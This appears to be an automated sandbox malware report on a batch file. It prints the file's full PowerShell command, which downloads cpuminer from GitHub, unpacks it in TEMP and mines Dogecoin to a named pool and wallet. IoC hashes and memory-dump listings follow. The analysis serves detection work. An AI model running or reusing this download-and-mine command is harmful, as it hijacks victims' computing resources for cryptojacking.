b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1789s
max time network
1798s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
03/02/2024, 14:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	4980	powershell.exe
4	4980	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4728	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4728	cpuminer-sse2.exe
4728	cpuminer-sse2.exe
4728	cpuminer-sse2.exe
4728	cpuminer-sse2.exe
4728	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4980	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 780 wrote to memory of 4980	780	cmd.exe	74
PID 780 wrote to memory of 4980	780	cmd.exe	74
PID 4980 wrote to memory of 1960	4980	powershell.exe	76
PID 4980 wrote to memory of 1960	4980	powershell.exe	76
PID 1960 wrote to memory of 4728	1960	cmd.exe	77
PID 1960 wrote to memory of 4728	1960	cmd.exe	77

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4728

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wfkkgpix.zdf.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
543KB

MD5
fb48f918ebd72b52e9ae61f813e83e28

SHA1
22cb9d4f84fce464c951009f3b10e7b6873ea40e

SHA256
246bdc832914a80452e1161a221bef17c2ecf2c0de3f01001b77f2bca1697206

SHA512
dfb2ca2c8f19277c448bb443d62a79e29a0d7de13269f34ed68b3eec89f0e56a68ef2d00d55db4c7951d7e54ae843d6706fd653d4cbe99e28ebd64ddf9e42962

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
227KB

MD5
a75a77b04315be35f8645104498d6668

SHA1
3aae830fb8f22d0c7c5d27c6fceccbe16dc00a95

SHA256
d367e4146dba4586005fcbc5dcafbcbae7aac9940bf3e46d5bdb7daf1aa0709d

SHA512
41ec2627586691674519d87f73cbc65528e18c48abbbaff309c06cf907730eb07dac23455e93f7615b7c96e9610e9b2631d7599460ebc5bb0b9dca80936416bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
304KB

MD5
dbc14026b9e01167d9822c9d08b793ad

SHA1
bb3e0d77c7c1ac0ba95c6715d044dabcd5ff0177

SHA256
94fe5729ba1e3d85dc8648a707ed8a9cc73f5985fdaea1c15d6801d1fa6464fe

SHA512
01ebbcf0c82c7c387ce51c1420850e576943dc019d69c908e95e6029521a0e234a0dca73017187c4500dcf4752e266a27444497fefa8215c401c9712370924f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
378KB

MD5
d3ff0c97769011663e0c6d5d18f0b98b

SHA1
e4182047694bda997c50daade96b11b888610ae2

SHA256
e2175bca1d1a944e9552c3dc5446e91a3674b55b169fcf86f5cc63c5d6c69910

SHA512
b270d89af58b1e646b8e990a664bba6c2cdfce254d98b653f81d99a8ab950ba9ecbc9b3ff030c8affc0739b6534247791d797669aa97bae1ab36007fa822f7af

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
569KB

MD5
a9159855fe56d38e994a2bc1eedcc260

SHA1
82d1939b49919d97cf65af64689b3a9f9a3bb4a8

SHA256
4d1599b074cf371d8dced08517cca6d1ddf739311eeb8847fcd129f97bdcb764

SHA512
5790f854ce73acbbd91317eceb34e127e44828d96f443f7d40a098f8ee72f533b0865753d9f252067af9fc5a2e09caa85405cad4eb47b830b9c706a3eaca036f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
341KB

MD5
724a6d347be02c6b171758eac9477f61

SHA1
7cf6ca96392f9e8e0659333bd1feb351df28d6e1

SHA256
7c70c3a4625012f9e7c4a22e1fdaf5cbf3c92a82b7507c3dde164a558dc7ef99

SHA512
96a0a6141fc9e64adbe112470c8aba3cc1fdcbfa6148791a5746e2e1bb850d5911cbed4373788893ffe190ee509c2c3975209bcc9157f79adaa79a5fdbe6b2b2

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
392KB

MD5
ea16c9430c28a46c029b4a867104676c

SHA1
cf9e7d65cddd28c45abf284463ad2c0537bffc9a

SHA256
d148da15587da825420d49b78a10604c8cbc6ce733593542cfab04f0a7d23506

SHA512
2c14b706464e57bb1c148d9eee48ff7707957d0135ad1a5d4d8d048daa07b3357a6b816d916f2e53805d51aa5cc2f8e2a0af89f4f59d0c8d695134945eb1fe9b

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
462KB

MD5
f97ed4e6c58c8753bec6dc4439079c45

SHA1
91d92b2eff6ede94e595a8e0a397443b6d749411

SHA256
a543833439263e8b451856bdd0b465cedabfca809f0ed5e044be2ad93b63ff87

SHA512
c48b8132d60a5e70463b3dc87615fd6529c52eb4771ec355fff3197f1a47fafe35abb8dd3d29145119c4a9e6b3809adb97e35ed5641fee22359dac7004110cb3

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
323KB

MD5
d9fe3afa4cc7c052df54ebead608b22c

SHA1
fa4b5cf9e992e1876e040c5beacd5a11b16aa495

SHA256
de9d95bb2cf0686124a1ded067b7460600d493cffa5af32d347fb920862c661e

SHA512
fc46eaa14eb47be4219adce07c9af019e7efbe79c0c034fdcb7a401f8ac2e6368a7e5d25bc98f51fe80940a8958dbd2bf01bd2aee2c04f49e6ce031ffd61dd68

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
702KB

MD5
1b7def68e816e9dae808bbea2a51ed74

SHA1
6b53c462e5df1a7bb066299911a7d1bec43ee05f

SHA256
f6db9c0ce4cb5397db015db1e0a1b9dc6ce0f1af22675960f34e166d2e653f09

SHA512
d1aba2c90398eb49b05064caaa0ce74f5448698d014f6df81a5d1daed563fac8fd838699f9d2dc9969a992581bfd4a537560fe9f878f4ad769ad201eb4e5686b

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
156KB

MD5
7f40bac455e16490fb91d7b58eea301d

SHA1
d23df4b43d387c08b6aee4001d132bc47c1e194c

SHA256
82bb7fb85f914705cc977acc71d4873b5655d92a9d8d137fdec35b15f5d571cc

SHA512
47400d56d7554deb05391db717cf6eb007f09e2d865021e1276d6b7fa3dd722c946f5adebd0e41694348d358598292b87547a5b24cf62c58d04b89c6f684911e

Download Submit
memory/4728-131-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4728-126-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4728-189-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/4728-181-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4728-174-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/4728-171-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4728-166-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4728-159-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/4728-156-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4728-151-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4728-144-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/4728-141-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4728-130-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/4728-129-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/4728-128-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4728-127-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4980-28-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

Filesize
64KB

Download
memory/4980-10-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

Filesize
64KB

Download
memory/4980-6-0x0000029336D30000-0x0000029336D40000-memory.dmp

Filesize
64KB

Download
memory/4980-7-0x0000029336F70000-0x000002933707E000-memory.dmp

Filesize
1.1MB

Download
memory/4980-8-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

Filesize
9.9MB

Download
memory/4980-4-0x0000029336DC0000-0x0000029336E52000-memory.dmp

Filesize
584KB

Download
memory/4980-11-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

Filesize
64KB

Download
memory/4980-5-0x0000029336D50000-0x0000029336D72000-memory.dmp

Filesize
136KB

Download
memory/4980-13-0x0000029337100000-0x0000029337176000-memory.dmp

Filesize
472KB

Download
memory/4980-35-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

Filesize
64KB

Download
memory/4980-31-0x0000029337280000-0x0000029337296000-memory.dmp

Filesize
88KB

Download
memory/4980-33-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

Filesize
9.9MB

Download
memory/4980-34-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

Filesize
64KB

Download
memory/4980-113-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

Filesize
9.9MB

Download
memory/4980-69-0x00000293370D0000-0x00000293370DA000-memory.dmp

Filesize
40KB

Download
memory/4980-56-0x00000293372A0000-0x00000293372B2000-memory.dmp

Filesize
72KB

Download